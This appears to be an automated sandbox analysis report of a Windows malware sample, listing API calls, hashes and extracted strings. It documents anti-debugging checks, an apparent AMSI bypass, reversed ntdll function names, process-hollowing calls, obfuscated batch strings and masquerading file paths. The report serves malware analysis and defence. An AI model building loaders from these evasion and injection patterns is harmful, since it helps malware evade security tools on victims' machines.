                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                                                                        • API String ID: 1002360270-4067648912
                                                                                                                        • Opcode ID: 6d62c1b94c058a6005c34ea5dd3cb3ba2b2e4b61e63761f85478651834153b7b
                                                                                                                        • Instruction ID: 5ea59f646bee579f4182ee219936777ad09f15ff1d3b63c2038769c2bfc16417
                                                                                                                        • Opcode Fuzzy Hash: 6d62c1b94c058a6005c34ea5dd3cb3ba2b2e4b61e63761f85478651834153b7b
                                                                                                                        • Instruction Fuzzy Hash: 23F0C871EC12146EEBA0AB6CAB44F76339EE7C1354F1208BDB10C87542EF70941ACB50

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 029DEC00
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 029DEC12
                                                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 029DEC29
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                        • API String ID: 35162468-539270669
                                                                                                                        • Opcode ID: 17dc18d7fdf9c56edb841cf2e62d8fda8ec2da95bc095c61a03ad52a80579afe
                                                                                                                        • Instruction ID: 4afa6c36ea49f182bb78530bd2e8f8012eae390dc46a8e93767a513e5e157e2b
                                                                                                                        • Opcode Fuzzy Hash: 17dc18d7fdf9c56edb841cf2e62d8fda8ec2da95bc095c61a03ad52a80579afe
                                                                                                                        • Instruction Fuzzy Hash: 2BF0277090024CABD722E7F888897DCFBAD4B05328FA44794D0A0661C0E37006409652

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 029C4EDA
                                                                                                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDC80), ref: 029DDBEB
                                                                                                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,029DDC80), ref: 029DDC1B
                                                                                                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 029DDC30
                                                                                                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 029DDC5C
                                                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 029DDC65
                                                                                                                          • Part of subcall function 029C4C0C: SysFreeString.OLEAUT32(029DE950), ref: 029C4C1A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2659941336-0
                                                                                                                        • Opcode ID: 608e70772edbecaa4ab343c8103046651aeb613fe627eff43af7eb394543e371
                                                                                                                        • Instruction ID: a59907c151e6f5eda630aca7789bfee1b621117af587b4d086899cdc84f00648
                                                                                                                        • Opcode Fuzzy Hash: 608e70772edbecaa4ab343c8103046651aeb613fe627eff43af7eb394543e371
                                                                                                                        • Instruction Fuzzy Hash: 56213371B403087AEB10EBE4CC52FDEB7BDAF88B00F504425B200F71C1DAB4AA059B65

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 029DE436
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CheckConnectionInternet
                                                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                        • API String ID: 3847983778-3852638603
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 029C4EDA
                                                                                                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDB9E), ref: 029DDB0B
                                                                                                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029DDB45
                                                                                                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029DDB72
                                                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029DDB7B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AllocCloseCreateStringWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3308905243-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029D8668
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                        • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                        • API String ID: 3130163322-2353454454
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029D7A27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                        • API String ID: 4072585319-445027087
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029D7A27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                        • API String ID: 4072585319-445027087
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D82C5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                        • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                        • API String ID: 2521977463-737317276
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D7D74
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                        • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                        • API String ID: 2719805696-3542721025
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 029D8529
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                        • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                        APIs
                                                                                                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 029DDA6C
                                                                                                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDABE), ref: 029DDA82
                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 029DDAA1
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFileInitStringUnicode
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 029C4EDA
                                                                                                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 029DDA6C
                                                                                                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDABE), ref: 029DDA82
                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 029DDAA1
                                                                                                                          • Part of subcall function 029C4C0C: SysFreeString.OLEAUT32(029DE950), ref: 029C4C1A
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocDeleteFileFreeInitUnicode
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D6CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,029D6D41,?,?,?,00000000), ref: 029D6D21
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,029D6E34,00000000,00000000,029D6DB3,?,00000000,029D6E23), ref: 029D6D9F
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFromInstanceProg
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • InetIsOffline.URL(00000000,00000000,029EAFA1,?,?,?,000002F7,00000000,00000000), ref: 029DECAE
                                                                                                                          • Part of subcall function 029D8824: LoadLibraryA.KERNEL32(00000000,00000000,029D890B), ref: 029D8858
                                                                                                                          • Part of subcall function 029D8824: FreeLibrary.KERNEL32(74B10000,00000000,02A21388,Function_000065D8,00000004,02A21398,02A21388,05F5E0FF,00000040,02A2139C,74B10000,00000000,00000000,00000000,00000000,029D890B), ref: 029D88EB
                                                                                                                          • Part of subcall function 029DEB94: GetModuleHandleW.KERNEL32(KernelBase,?,029DEF98,UacInitialize,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,Initialize), ref: 029DEB9A
                                                                                                                          • Part of subcall function 029DEB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 029DEBAC
                                                                                                                          • Part of subcall function 029DEBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 029DEC00
                                                                                                                          • Part of subcall function 029DEBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 029DEC12
                                                                                                                          • Part of subcall function 029DEBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 029DEC29
                                                                                                                          • Part of subcall function 029C7E18: GetFileAttributesA.KERNEL32(00000000,?,029DF8CC,ScanString,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,UacScan,02A2137C,029EAFD8,UacInitialize), ref: 029C7E23
                                                                                                                          • Part of subcall function 029CC2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B158C8,?,029DFBFE,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession), ref: 029CC303
                                                                                                                          • Part of subcall function 029DDBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDC80), ref: 029DDBEB
                                                                                                                          • Part of subcall function 029DDBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,029DDC80), ref: 029DDC1B
                                                                                                                          • Part of subcall function 029DDBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 029DDC30
                                                                                                                          • Part of subcall function 029DDBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 029DDC5C
                                                                                                                          • Part of subcall function 029DDBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 029DDC65
                                                                                                                          • Part of subcall function 029C7E3C: GetFileAttributesA.KERNEL32(00000000,?,029E2A49,ScanString,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,Initialize), ref: 029C7E47
                                                                                                                          • Part of subcall function 029C7FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,029E2BE7,OpenSession,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,Initialize,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8), ref: 029C7FDD
                                                                                                                          • Part of subcall function 029DDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDB9E), ref: 029DDB0B
                                                                                                                          • Part of subcall function 029DDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029DDB45
                                                                                                                          • Part of subcall function 029DDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029DDB72
                                                                                                                          • Part of subcall function 029DDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029DDB7B
                                                                                                                          • Part of subcall function 029D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,UacScan), ref: 029D87B4
                                                                                                                          • Part of subcall function 029D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029D87CE
                                                                                                                          • Part of subcall function 029D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize), ref: 029D880A
                                                                                                                          • Part of subcall function 029D870C: LoadLibraryW.KERNEL32(amsi), ref: 029D8715
                                                                                                                          • Part of subcall function 029D870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 029D8774
                                                                                                                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,029EB330), ref: 029E49B7
                                                                                                                          • Part of subcall function 029DDA44: RtlInitUnicodeString.NTDLL(?,?), ref: 029DDA6C
                                                                                                                          • Part of subcall function 029DDA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDABE), ref: 029DDA82
                                                                                                                          • Part of subcall function 029DDA44: NtDeleteFile.NTDLL(?), ref: 029DDAA1
                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 029E4BB7
                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 029E4C0D
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                                        • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8824: LoadLibraryA.KERNEL32(00000000,00000000,029D890B), ref: 029D8858
                                                                                                                          • Part of subcall function 029D8824: FreeLibrary.KERNEL32(74B10000,00000000,02A21388,Function_000065D8,00000004,02A21398,02A21388,05F5E0FF,00000040,02A2139C,74B10000,00000000,00000000,00000000,00000000,029D890B), ref: 029D88EB
                                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02B157DC,02B15820,OpenSession,02A2137C,029EAFD8,UacScan,02A2137C), ref: 029E7E39
                                                                                                                        • ResumeThread.KERNEL32(00000000,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,UacScan,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8), ref: 029E8483
                                                                                                                        • CloseHandle.KERNEL32(00000000,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,UacScan,02A2137C,029EAFD8,00000000,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C), ref: 029E8602
                                                                                                                          • Part of subcall function 029D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,UacScan), ref: 029D87B4
                                                                                                                          • Part of subcall function 029D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029D87CE
